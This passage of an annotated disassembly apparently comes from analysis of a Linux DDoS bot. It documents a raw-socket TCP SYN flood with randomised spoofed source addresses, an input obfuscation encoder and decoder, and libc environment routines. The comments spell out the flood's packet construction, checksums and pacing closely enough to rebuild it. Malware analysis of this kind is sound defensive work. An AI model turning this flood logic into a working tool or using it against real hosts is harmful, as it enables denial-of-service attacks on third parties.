        xor eax, eax                    ; return 0;
        lea esp, [ebp+saved_regs]       ; cleanup & restore the stack
        pop ebx                         ; |
        pop esi                         ; |
        pop edi                         ; |
        mov esp, ebp                    ; |
        pop ebp                         ; v
        retn
sub_80499F4 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
;
; sub_8049D40 -- raw-socket TCP SYN flood toward one IPv4 address or hostname.
; Runs forever; the only exit is loc_804A178 when socket() fails.
;
; Stack arguments:
;   dstaddr_a..d              destination octets (numeric mode).
;   dstport_hi / dstport_lo   destination port = (hi << 8) | lo.
;   use_srcaddr / srcaddr_a..d  non-zero: fixed source from the octets; zero: a
;                             new random "%u.%u.%u.%u" source per packet (fully
;                             spoofed source).
;   lookup_step               send pacing, same scheme as sub_8049564.
;   use_dsthost / dsthost     hostname mode, re-resolved every 40000 packets with
;                             sleep(600) on failure.
;
; Seeds srandom(time(0)) once. Each packet is 40 bytes (IP 20 + TCP 20, data
; offset 5, no options) with flags = SYN only, ack = 0, urgent = 0, and per
; packet: IP ID = 512 + random()%3089, TTL = 125 + random()%116, TCP source port
; 1..40000, sequence 1..40000000, window 200..1600. The TCP checksum is computed
; over a 12-byte pseudo-header (var_58: saddr, daddr, 0, 6, htons(20)) followed
; by a copy of the TCP header; the IP checksum over the 20-byte header.
; sendto() return values are ignored.
;
; Attributes: bp-based frame hidden
sub_8049D40 proc near                   ; CODE XREF: main+BC4p main+C9Ep
saved_regs = dword ptr -0D8h
internal1 = dword ptr -0CCh
save_dd = dword ptr -0C8h
internal2 = dword ptr -0C4h
sockfd = dword ptr -0C0h
save_sd = dword ptr -0BCh
save_sc = dword ptr -0B8h
save_sb = dword ptr -0B4h
save_sa = dword ptr -0B0h
save_dc = dword ptr -0ACh
save_db = dword ptr -0A8h
save_da = dword ptr -0A4h
checksum = word ptr -9Eh
ipaddr = dword ptr -9Ch
srcaddr_buf = byte ptr -98h
dstaddr_buf = byte ptr -78h
var_58 = byte ptr -58h
iphdr = byte ptr -38h
tcphdr = byte ptr -24h
dstaddr = byte ptr -10h
dstaddr_a = dword ptr 8
dstaddr_b = dword ptr 0Ch
dstaddr_c = dword ptr 10h
dstaddr_d = dword ptr 14h
dstport_hi = dword ptr 18h
dstport_lo = dword ptr 1Ch
use_srcaddr = dword ptr 20h
srcaddr_a = dword ptr 24h
srcaddr_b = dword ptr 28h
srcaddr_c = dword ptr 2Ch
srcaddr_d = dword ptr 30h
lookup_step = dword ptr 34h
use_dsthost = dword ptr 38h
dsthost = dword ptr 3Ch
        push ebp
        mov ebp, esp
        sub esp, 0CCh
        push edi
        push esi
        push ebx
        mov bl, byte ptr [ebp+dstaddr_a]
        mov byte ptr [ebp+save_da], bl  ; save_da = dstaddr_a (low byte)
        mov bl, byte ptr [ebp+dstaddr_b]
        mov byte ptr [ebp+save_db], bl
        mov bl, byte ptr [ebp+dstaddr_c]
        mov byte ptr [ebp+save_dc], bl
        mov bl, byte ptr [ebp+dstaddr_d]
        mov byte ptr [ebp+save_dd], bl
        mov bl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_sa], bl  ; save_sa = srcaddr_a (low byte)
        mov bl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_sb], bl
        mov bl, byte ptr [ebp+srcaddr_c]
        mov byte ptr [ebp+save_sc], bl
        mov bl, byte ptr [ebp+srcaddr_d]
        mov byte ptr [ebp+save_sd], bl
        cmp [ebp+lookup_step], 0
        jz short loc_8049D9D
        dec [ebp+lookup_step]           ; pacing argument N > 0 becomes N-1
loc_8049D9D:                            ; CODE XREF: sub_8049D40+58j
        push 0
        call time
        add esp, 4
        push eax
        call __srandom                  ; srandom(time(0))
        add esp, 4
        mov word ptr [ebp+dstaddr], 2   ; dstaddr.sin_family = AF_INET
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov eax, edx
        xchg al, ah
        mov word ptr [ebp+dstaddr+2], ax ; dstaddr.sin_port = htons(random() % 255)
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049E0B
        movzx eax, byte ptr [ebp+save_dd]
        push eax
        movzx eax, byte ptr [ebp+save_dc]
        push eax
        movzx eax, byte ptr [ebp+save_db]
        push eax
        movzx eax, byte ptr [ebp+save_da]
        push eax
        push offset aD_D_D_D            ; "%d.%d.%d.%d"
        lea ebx, [ebp+dstaddr_buf]
        push ebx
        call sprintf                    ; sprintf(dstaddr_buf, "%d.%d.%d.%d", ...)
        push ebx
        call inet_addr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = inet_addr(dstaddr_buf)
        add esp, 1Ch
loc_8049E0B:                            ; CODE XREF: sub_8049D40+8Fj
        mov [ebp+iphdr], 45h            ; version 4, ihl 5
        mov word ptr [ebp+iphdr+2], 2800h ; tot_len = htons(40)
        mov [ebp+iphdr+1], 0            ; tos = 0
        push 0FFh                       ; *reserved*
        push 3                          ; SOCK_RAW
        push 2                          ; PF_INET
        call socket                     ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        test eax, eax
        jle loc_804A178
        cmp [ebp+use_srcaddr], 0
        jz short loc_8049E72            ; no fixed source: srcaddr_buf is generated per packet below
        movzx eax, byte ptr [ebp+save_sd]
        push eax
        movzx eax, byte ptr [ebp+save_sc]
        push eax
        movzx eax, byte ptr [ebp+save_sb]
        push eax
        movzx eax, byte ptr [ebp+save_sa]
        push eax
        push offset aD_D_D_D            ; "%d.%d.%d.%d"
        lea eax, [ebp+srcaddr_buf]
        push eax
        call sprintf                    ; sprintf(srcaddr_buf, "%d.%d.%d.%d", ...) once
        add esp, 18h
loc_8049E72:                            ; CODE XREF: sub_8049D40+FCj
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049E87
        lea eax, [ebp+dstaddr_buf]
        push eax
        call inet_addr
        mov dword ptr [ebp+iphdr+10h], eax ; daddr = inet_addr(dstaddr_buf)
        add esp, 4
loc_8049E87:                            ; CODE XREF: sub_8049D40+136j
        mov word ptr [ebp+iphdr+6], 0   ; frag_off = 0
        mov [ebp+iphdr+9], 6            ; protocol = IPPROTO_TCP
        ; compiler-generated bitfield writes; net effect below: doff = 5, flags = SYN
        mov al, [ebp+tcphdr+0Dh]
        and al, 0EFh
        mov [ebp+tcphdr+0Dh], al
        mov al, [ebp+tcphdr+0Ch]
        and al, 0Fh
        or al, 50h
        mov [ebp+tcphdr+0Ch], al
        mov dword ptr [ebp+tcphdr+8], 0 ; ack_seq = 0
        and al, 50h
        mov [ebp+tcphdr+0Ch], al        ; data offset 5 (20-byte header), reserved bits 0
        mov [ebp+tcphdr+0Dh], 2         ; flags = SYN
        mov word ptr [ebp+tcphdr+12h], 0 ; urg_ptr = 0
        mov eax, [ebp+dstport_hi]
        shl eax, 8
        add ax, word ptr [ebp+dstport_lo]
        xchg al, ah
        mov word ptr [ebp+tcphdr+2], ax ; dest = htons((dstport_hi << 8) | dstport_lo)
        xor edi, edi                    ; edi = pacing counter (compared with lookup_step)
        ; pseudo-header for the TCP checksum lives in var_58: +0 saddr, +4 daddr,
        ; +8 zero, +9 protocol, +0Ah TCP length; the TCP header is copied to +0Ch
        mov [ebp+var_58+8], 0
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049EDB
        mov eax, dword ptr [ebp+iphdr+10h]
        mov dword ptr [ebp+var_58+4], eax ; pseudo daddr
loc_8049EDB:                            ; CODE XREF: sub_8049D40+193j
        mov [ebp+var_58+9], 6           ; pseudo protocol = TCP
        mov word ptr [ebp+var_58+0Ah], 1400h ; pseudo length = htons(20)
        xor esi, esi                    ; esi = packets left before re-resolving dsthost
        lea ebx, [ebp+var_58]
        mov [ebp+internal2], ebx
loc_8049EF0:                            ; CODE XREF: sub_8049D40+222j
                                        ; sub_8049D40+429j ...
        mov [ebp+internal1], 0          ; internal1 = "skip this iteration" flag
        cmp [ebp+use_dsthost], 0
        jz short loc_8049F5B
        test esi, esi
        jg short loc_8049F5B
        mov ebx, [ebp+dsthost]
        push ebx
        call gethostbyname              ; gethostbyname(dsthost)
        mov edx, eax
        add esp, 4
        test edx, edx
        jnz short loc_8049F30
        push 258h
        call sleep                      ; sleep(600) and retry
        mov [ebp+internal1], 1
        add esp, 4
        jmp short loc_8049F5B
; ---------------------------------------------------------------------------
        align 4
loc_8049F30:                            ; CODE XREF: sub_8049D40+1D4j
        push 4
        lea eax, [ebp+ipaddr]
        push eax
        mov eax, [edx+10h]
        mov eax, [eax]
        push eax
        call bcopy                      ; bcopy(he->h_addr, &ipaddr, 4)
        mov eax, [ebp+ipaddr]
        mov dword ptr [ebp+iphdr+10h], eax ; iphdr->daddr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr
        mov dword ptr [ebp+var_58+4], eax ; pseudo daddr
        mov esi, 40000
        add esp, 0Ch
loc_8049F5B:                            ; CODE XREF: sub_8049D40+1BEj
                                        ; sub_8049D40+1C2j ...
        cmp [ebp+internal1], 0
        jnz short loc_8049EF0
        call random
        mov ebx, 3089
        cdq
        idiv ebx
        mov eax, edx
        add ah, 2
        xchg al, ah
        mov word ptr [ebp+iphdr+4], ax  ; id = htons(512 + random() % 3089)
        call random
        mov ebx, 1401
        cdq
        idiv ebx
        mov eax, edx
        add ax, 200
        xchg al, ah
        mov word ptr [ebp+tcphdr+0Eh], ax ; window = htons(200 + random() % 1401)
        call random
        mov ebx, 40000
        cdq
        idiv ebx
        mov eax, edx
        inc ax
        xchg al, ah
        mov word ptr [ebp+tcphdr], ax   ; source = htons(1 + random() % 40000)
        call random
        mov ebx, 40000000
        cdq
        idiv ebx
        lea eax, [edx+1]
        xchg al, ah
        ror eax, 10h
        xchg al, ah                     ; htonl()
        mov dword ptr [ebp+tcphdr+4], eax ; seq = htonl(1 + random() % 40000000)
        call random
        mov ebx, 116
        cdq
        idiv ebx
        add dl, 125
        mov [ebp+iphdr+8], dl           ; ttl = 125 + random() % 116  (125..240)
        cmp [ebp+use_srcaddr], 0
        jnz short loc_804A01C
        ; random spoofed source: four random()%255 octets formatted as text
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        push edx
        call __random
        cdq
        idiv ebx
        push edx
        call __random
        cdq
        idiv ebx
        push edx
        call __random
        cdq
        idiv ebx
        push edx
        push offset aU_U_U_U            ; "%u.%u.%u.%u"
        lea eax, [ebp+srcaddr_buf]
        push eax
        call sprintf                    ; sprintf(srcaddr_buf, "%u.%u.%u.%u", r1, r2, r3, r4)
        add esp, 18h
loc_804A01C:                            ; CODE XREF: sub_8049D40+29Dj
        lea eax, [ebp+srcaddr_buf]
        push eax
        call inet_addr
        mov dword ptr [ebp+iphdr+0Ch], eax ; saddr = inet_addr(srcaddr_buf)
        mov dword ptr [ebp+var_58], eax ; pseudo saddr
        mov word ptr [ebp+tcphdr+10h], 0 ; tcp check = 0 before summing
        mov word ptr [ebp+iphdr+0Ah], 0 ; ip check = 0 before summing
        push 14h
        lea eax, [ebp+var_58+0Ch]
        push eax
        lea eax, [ebp+tcphdr]
        push eax
        call bcopy                      ; bcopy(&tcphdr, var_58 + 12, 20)
        add esp, 10h
        ; TCP checksum: 32 bytes = 12-byte pseudo-header + 20-byte TCP header
        mov edx, 20h
        mov ebx, [ebp+internal2]
        mov [ebp+internal1], ebx
        xor ecx, ecx
        mov [ebp+checksum], 0
loc_804A068:                            ; CODE XREF: sub_8049D40+342j
        mov ebx, [ebp+internal1]
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        mov [ebp+internal1], ebx
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_804A068
        jnz short loc_804A097
        mov al, [ebx]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ecx, eax
loc_804A097:                            ; CODE XREF: sub_8049D40+344j
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]
        mov eax, ecx
        sar eax, 10h
        add ecx, eax
        mov eax, ecx
        not ax
        mov [ebp+checksum], ax
        mov word ptr [ebp+tcphdr+10h], ax ; tcphdr->check
        ; IP header checksum over 20 bytes
        mov edx, 14h
        lea ebx, [ebp+iphdr]
        mov [ebp+internal1], ebx
        xor ecx, ecx
        mov [ebp+checksum], 0
        lea esi, [esi]
loc_804A0D4:                            ; CODE XREF: sub_8049D40+3AEj
        mov ebx, [ebp+internal1]
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        mov [ebp+internal1], ebx
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_804A0D4
        jnz short loc_804A103
        mov al, [ebx]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ecx, eax
loc_804A103:                            ; CODE XREF: sub_8049D40+3B0j
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]
        mov eax, ecx
        sar eax, 10h
        add ecx, eax
        mov eax, ecx
        not ax
        mov [ebp+checksum], ax
        mov word ptr [ebp+iphdr+0Ah], ax ; iphdr->check
        push 16                         ; sizeof(dstaddr)
        lea eax, [ebp+dstaddr]
        push eax                        ; &dstaddr
        push 0                          ; flags
        push 40                         ; 20 + 20 bytes; iphdr and tcphdr are adjacent on the stack
        lea eax, [ebp+iphdr]
        push eax                        ; &iphdr
        mov ebx, [ebp+sockfd]
        push ebx                        ; sockfd
        call sendto                     ; sendto(sockfd, &iphdr, 40, 0, &dstaddr, 16) -- result ignored
        add esp, 18h
        ; pacing, same scheme as sub_8049564 (edi plays the role of lookup_stepper)
        cmp [ebp+lookup_step], 0
        jnz short loc_804A154
        push 12Ch
        call usleep                     ; usleep(300) after every packet
        jmp short loc_804A165
; ---------------------------------------------------------------------------
loc_804A154:                            ; CODE XREF: sub_8049D40+406j
        cmp [ebp+lookup_step], edi
        jnz short loc_804A170
        push 12Ch
        call usleep                     ; usleep(300) every lookup_step+1 packets
        xor edi, edi
loc_804A165:                            ; CODE XREF: sub_8049D40+412j
        dec esi                         ; counted down only on the sleep paths
        add esp, 4
        jmp loc_8049EF0
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A170:                            ; CODE XREF: sub_8049D40+417j
        inc edi
        jmp loc_8049EF0                 ; no exit condition: loops until killed
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A178:                            ; CODE XREF: sub_8049D40+F2j
        ; socket() failure path
        mov ds:child_pid, 0             ; child_pid = 0
        xor eax, eax                    ; return 0
        lea esp, [ebp+saved_regs]       ; cleanup & restore the stack
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_8049D40 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
;
; encode_input(len, src, dest) -- obfuscates len bytes of src into dest.
;   dest[0] = src[0] + 0x17            (written with sprintf "%c", so a NUL
;                                       is also placed at dest[1])
;   dest[i] = src[i] + dest[i-1] + 0x17 for i = 1 .. len-1 (byte arithmetic,
;                                       wraps mod 256)
; Each output byte therefore depends on the previous output byte (a running
; additive chain). No terminator is written after dest[len-1]; dest must hold at
; least len bytes. The loop ends on `i != len`, so len <= 0 is not guarded and
; would run away -- callers must pass len >= 1 (caller not visible here).
; decode_input below is the inverse.
;
; Attributes: bp-based frame hidden
encode_input proc near                  ; CODE XREF: main+286p main+582p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0]            ; edi = len
        mov esi, [ebp+arg_4]            ; esi = src
        mov ebx, [ebp+arg_8]            ; ebx = dest
        mov al, ds:null_byte            ; dest[0] = 0 (immediately overwritten by the sprintf below)
        mov [ebx], al
        mov al, [esi]                   ; put 1st byte of src in al
        add al, 17h                     ; add 0x17 to it
        movsx eax, al                   ; put in eax (sign-extended; "%c" only uses the low byte)
        push eax                        ; 1st byte of src + 0x17
        push offset aC                  ; "%c"
        push ebx                        ; dest
        call sprintf                    ; sprintf(dest, "%c", src[0] + 0x17)
        mov ecx, 1                      ; i = 1
        cmp ecx, edi
        jz short loc_804A1DD            ; len == 1: nothing more to do
        nop
loc_804A1C8:                            ; CODE XREF: encode_input+47j
        movzx edx, byte ptr [ebx+ecx-1] ; edx = dest[i - 1]
        movzx eax, byte ptr [ecx+esi]   ; eax = src[i]
        lea eax, [edx+eax+17h]          ; eax = src[i] + dest[i - 1] + 0x17
        mov [ecx+ebx], al               ; dest[i] = eax truncated to byte
        inc ecx                         ; i++
        cmp ecx, edi
        jnz short loc_804A1C8           ; while (i != len)
loc_804A1DD:                            ; CODE XREF: encode_input+31j
        lea esp, [ebp+var_C]            ; also discards the 3 sprintf arguments
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
encode_input endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
;
; decode_input(len, src, dest) -- inverse of encode_input.
; Allocates a len-byte scratch buffer on the stack (alloca, size rounded up to
; a multiple of 4), sets dest[0] = 0, then walks src from the last byte to the
; first: c = src[i] - src[i-1] - 0x17 (src[-1] taken as 0), brought into 0..255
; by adding 0x100 while negative, and prepends c to the string in dest with
; sprintf(dest, "%c%s", c, copy_of_dest). Every prepend copies the whole current
; string, so the routine is O(len^2). After len iterations the string is len
; characters plus the NUL that sprintf appends, i.e. len+1 bytes: a dest buffer
; of exactly len bytes is overrun by one (caller sizing is not visible here).
; A decoded byte of 0 terminates the string early, so the following "%s" copies
; nothing past it. len <= 0 returns immediately; eax is not a meaningful result.
;
; Attributes: bp-based frame hidden
decode_input proc near                  ; CODE XREF: main+1D8p
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        sub esp, 4
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0]            ; edi = length (ex. 200)
        lea ebx, [edi-1]                ; ebx = length - 1 (ex. 199), the index walked downwards
        lea eax, [edi+3]                ; eax = length + 3 (ex. 203)
        and al, 0FCh                    ; round eax to 4 byte boundary (low byte only)
        sub esp, eax                    ; alloca()
        mov [ebp+var_4], esp            ; store alloca() result in workbuf
        mov al, ds:null_byte            ; null terminate the destination buffer
        mov esi, [ebp+arg_8]            ; offset to first byte of dest buffer
        mov [esi], al                   ; store null terminator in first element of dest buffer
        test ebx, ebx                   ; length - 1 < 0, i.e. length <= 0 ...
        jl loc_804A29B                  ; ... return without decoding
loc_804A214:                            ; CODE XREF: decode_input+ADj
        lea edx, [ebx-1]                ; edx = ebx - 1
        test ebx, ebx                   ; if (!ebx)
        jz short loc_804A22C
        mov esi, [ebp+arg_4]
        movzx eax, byte ptr [ebx+esi]   ; eax = src[ebx]
        movzx edx, byte ptr [edx+esi]   ; edx = src[edx]
        sub eax, edx                    ; eax -= edx
        jmp short loc_804A232
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A22C:                            ; CODE XREF: decode_input+31j
        mov esi, [ebp+arg_4]
        movzx eax, byte ptr [esi]       ; eax = src[0]
loc_804A232:                            ; CODE XREF: decode_input+40j
        lea ecx, [eax-17h]              ; ecx = difference - 0x17
        test ecx, ecx
        jge short loc_804A244
        db 8Dh,76h,0                    ; lea esi, [esi+0] ; compiler artifact
loc_804A23C:                            ; CODE XREF: decode_input+5Aj
        add ecx, 100h                   ; bring a negative result back into 0..255
        js short loc_804A23C
loc_804A244:                            ; CODE XREF: decode_input+4Fj
        ; workbuf[0..len-1] = dest[0..len-1]
        xor edx, edx
        cmp edx, edi                    ; compiler artifact
        jge short loc_804A25D           ; compiler artifact
        lea esi, [esi]                  ; compiler artifact
loc_804A24C:                            ; CODE XREF: decode_input+73j
        mov esi, [ebp+arg_8]
        mov al, [edx+esi]
        mov esi, [ebp+var_4]
        mov [edx+esi], al
        inc edx
        cmp edx, edi
        jl short loc_804A24C
loc_804A25D:                            ; CODE XREF: decode_input+60j
        ; dest[0] = c; dest[1..len-1] = workbuf[0..len-2] -- the sprintf below
        ; then rewrites the same bytes, so this shift appears redundant
        mov esi, [ebp+arg_8]
        mov [esi], cl
        mov edx, 1
        cmp edx, edi
        jge short loc_804A27E
        nop
loc_804A26C:                            ; CODE XREF: decode_input+94j
        mov esi, [ebp+var_4]
        mov al, [edx+esi-1]
        mov esi, [ebp+arg_8]
        mov [edx+esi], al
        inc edx
        cmp edx, edi
        jl short loc_804A26C
loc_804A27E:                            ; CODE XREF: decode_input+81j
        mov esi, [ebp+var_4]
        push esi                        ; workbuf (previous string)
        push ecx                        ; c
        push offset aCS                 ; "%c%s"
        mov esi, [ebp+arg_8]
        push esi                        ; dest
        call sprintf                    ; sprintf(dest, "%c%s", c, workbuf)
        add esp, 10h
        dec ebx
        jns loc_804A214                 ; next byte toward the front of src
loc_804A29B:                            ; CODE XREF: decode_input+26j
        lea esp, [ebp+var_10]           ; releases the alloca'd scratch buffer
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
decode_input endp
; ---------------------------------------------------------------------------
        db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
;
; setenv(name, value, overwrite) -- libc setenv(3) linked into this static
; binary (it manipulates the __environ global and keeps the array it last
; allocated in dword_80784F4).
;   name  = arg_0, value = arg_4, overwrite = arg_8
;   var_8 = strlen(name), var_C = strlen(value), var_4 = index into __environ,
;   var_10 = return value.
; Scans __environ for an entry that starts with "name=".
;   Not found: malloc a pointer array of (count + 2) entries, copy the old
;     pointers, malloc strlen(name)+strlen(value)+2 bytes and build "name=value",
;     free the array previously allocated here (dword_80784F4) and publish the
;     new one through __environ.
;   Found, overwrite != 0: if the existing string is shorter than
;     strlen(name)+strlen(value)+1, malloc a replacement and swap the pointer;
;     otherwise "name=value" (including its NUL) is written over the existing
;     string in place.
;   Found, overwrite == 0: no-op.
; Returns 0, or -1 when malloc fails. errno = 0Ch (ENOMEM) is set only on the
; second malloc failure of the not-found path; the other two failure paths
; leave errno untouched.
;
; Attributes: bp-based frame hidden
setenv proc near                        ; CODE XREF: main+946p main+964p
var_24 = byte ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        sub esp, 18h
        push edi
        push esi
        push ebx
        xor dl, dl
        mov edi, [ebp+arg_0]
        mov al, dl
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb                     ; inline strlen(name)
        not ecx
        mov esi, ecx
        dec esi
        mov [ebp+var_8], esi            ; var_8 = strlen(name)
        mov edi, [ebp+arg_4]
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb                     ; inline strlen(value)
        not ecx
        mov eax, ecx
        dec eax
        mov [ebp+var_C], eax            ; var_C = strlen(value)
        mov [ebp+var_10], 0             ; result = 0
        mov [ebp+var_4], 0              ; index = 0
        mov ebx, __environ
        cmp dword ptr [ebx], 0
        jz short loc_804A322            ; empty environment -> not found
loc_804A2F4:                            ; CODE XREF: setenv+6Fj
        mov esi, [ebx]
        mov edi, [ebp+arg_0]
        mov ecx, [ebp+var_8]
        cld
        test al, 0                      ; forces ZF=1 so a zero-length compare reads as equal
        repe cmpsb                      ; memcmp(entry, name, strlen(name))
        jnz short loc_804A30E
        mov esi, [ebx]
        mov eax, [ebp+var_8]
        cmp byte ptr [eax+esi], 3Dh     ; entry[strlen(name)] == '='
        jz short loc_804A319
loc_804A30E:                            ; CODE XREF: setenv+59j
        inc [ebp+var_4]
        add ebx, 4
        cmp dword ptr [ebx], 0
        jnz short loc_804A2F4
loc_804A319:                            ; CODE XREF: setenv+64j
        cmp dword ptr [ebx], 0
        jnz loc_804A408                 ; found: ebx points at the matching slot
loc_804A322:                            ; CODE XREF: setenv+4Aj
        ; --- not found: grow the environment array by one entry ---
        mov esi, [ebp+var_4]
        lea esi, ds:8[esi*4]            ; (count + 2) * sizeof(char *)
        push esi
        call malloc
        mov ebx, eax
        add esp, 4
        test ebx, ebx
        jz short loc_804A384            ; -1 (errno not set here)
        mov eax, __environ
        mov esi, [ebp+var_4]
        lea edx, ds:0[esi*4]
        push edx
        push eax
        push ebx
        call memcpy                     ; memcpy(new_env, __environ, count * 4)
        add esp, 0Ch
        mov eax, [ebp+var_C]
        mov esi, [ebp+var_8]
        lea eax, [esi+eax+2]            ; strlen(name) + strlen(value) + 2 ('=' and NUL)
        push eax
        call malloc
        mov edx, eax
        mov esi, [ebp+var_4]
        mov [ebx+esi*4], edx            ; new_env[count] = new string
        add esp, 4
        test edx, edx
        jnz short loc_804A390
        push ebx
        call free                       ; release the array again
        mov __errno, 0Ch                ; errno = ENOMEM
loc_804A384:                            ; CODE XREF: setenv+91j setenv+19Bj
        mov [ebp+var_10], 0FFFFFFFFh    ; result = -1
        jmp loc_804A47F
; ---------------------------------------------------------------------------
loc_804A390:                            ; CODE XREF: setenv+CAj
        mov eax, [ebp+var_4]
        mov eax, [ebx+eax*4]
        mov [ebp+var_14], eax
        mov esi, [ebp+var_8]
        push esi
        mov eax, [ebp+arg_0]
        push eax
        mov esi, [ebp+var_14]
        push esi
        call memcpy                     ; memcpy(str, name, strlen(name))
        add esp, 0Ch
        mov eax, [ebp+var_4]
        mov eax, [ebx+eax*4]
        mov esi, [ebp+var_8]
        mov byte ptr [esi+eax], 3Dh     ; str[strlen(name)] = '='
        mov edx, [ebp+var_C]
        inc edx
        mov eax, [ebp+var_4]
        add esi, [ebx+eax*4]
        inc esi
        mov [ebp+var_14], esi
        push edx
        mov esi, [ebp+arg_4]
        push esi
        mov eax, [ebp+var_14]
        push eax
        call memcpy                     ; memcpy(str + strlen(name) + 1, value, strlen(value) + 1)
        add esp, 0Ch
        mov esi, [ebp+var_4]
        mov dword ptr [ebx+esi*4+4], 0  ; new_env[count + 1] = NULL
        cmp dword_80784F4, 0
        jz short loc_804A3F8
        mov eax, dword_80784F4
        push eax
        call free                       ; free the array this routine allocated last time
loc_804A3F8:                            ; CODE XREF: setenv+143j
        mov dword_80784F4, ebx
        mov __environ, ebx              ; publish the new array
        jmp short loc_804A47F
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A408:                            ; CODE XREF: setenv+74j
        ; --- found: replace only if overwrite != 0 ---
        cmp [ebp+arg_8], 0
        jz short loc_804A47F
        xor dl, dl
        mov edi, [ebx]
        mov al, dl
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb                     ; inline strlen(existing entry)
        not ecx
        mov esi, ecx
        dec esi
        mov [ebp+var_14], esi
        mov eax, [ebp+var_C]
        mov esi, [ebp+var_8]
        lea edx, [esi+eax+1]            ; needed = strlen(name) + strlen(value) + 1
        cmp [ebp+var_14], edx
        jnb short loc_804A44B           ; existing string is long enough: overwrite in place
        lea eax, [edx+1]
        push eax
        call malloc                     ; malloc(needed + 1)
        mov edx, eax
        add esp, 4
        test edx, edx
        jz loc_804A384                  ; -1 (errno not set here)
        mov [ebx], edx                  ; swap the slot to the new string (old one is not freed)
loc_804A44B:                            ; CODE XREF: setenv+189j
        mov eax, [ebx]
        mov [ebp+var_14], eax
        mov esi, [ebp+var_8]
        push esi
        mov eax, [ebp+arg_0]
        push eax
        mov esi, [ebp+var_14]
        push esi
        call memcpy                     ; memcpy(str, name, strlen(name))
        add esp, 0Ch
        mov eax, [ebx]
        mov esi, [ebp+var_8]
        mov byte ptr [esi+eax], 3Dh     ; str[strlen(name)] = '='
        mov edx, [ebp+var_C]
        inc edx
        add esi, [ebx]
        inc esi
        push edx
        mov eax, [ebp+arg_4]
        push eax
        push esi
        call memcpy                     ; memcpy(str + strlen(name) + 1, value, strlen(value) + 1)
loc_804A47F:                            ; CODE XREF: setenv+E3j setenv+15Cj ...
        mov eax, [ebp+var_10]           ; return result (0 or -1)
        lea esp, [ebp+var_24]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
setenv endp
; =============== S U B R O U T I N E =======================================
;
; unsetenv(name) -- libc unsetenv(3) for this static binary. Removes every
; __environ entry that starts with "name=" by compacting the array in place
; (edx is the read cursor, ebx the write cursor) and re-terminating it with a
; NULL pointer. The entry strings themselves are not freed. No return value is
; set up.
;
; Attributes: bp-based frame hidden
unsetenv proc near                      ; CODE XREF: main+953p
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 4
        push edi
        push esi
        push ebx
        xor al, al
        mov edi, [ebp+arg_0]
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb                     ; inline strlen(name)
        mov eax, ecx
        not eax
        dec eax
        mov [ebp+var_4], eax            ; var_4 = strlen(name)
        mov ebx, __environ              ; ebx = write cursor
        mov edx, ebx                    ; edx = read cursor
        cmp dword ptr [ebx], 0
        jz short loc_804A4E1
        nop
loc_804A4B8:                            ; CODE XREF: unsetenv+53j
        mov esi, [edx]
        mov edi, [ebp+arg_0]
        mov ecx, [ebp+var_4]
        cld
        test al, 0                      ; forces ZF=1 so a zero-length compare reads as equal
        repe cmpsb                      ; memcmp(entry, name, strlen(name))
        jnz short loc_804A4D2
        mov eax, [edx]
        mov esi, [ebp+var_4]
        cmp byte ptr [esi+eax], 3Dh     ; entry[strlen(name)] == '=' -> drop it (skip the copy)
        jz short loc_804A4D9
loc_804A4D2:                            ; CODE XREF: unsetenv+39j
        mov eax, [edx]
        mov [ebx], eax                  ; keep: copy pointer to the write cursor
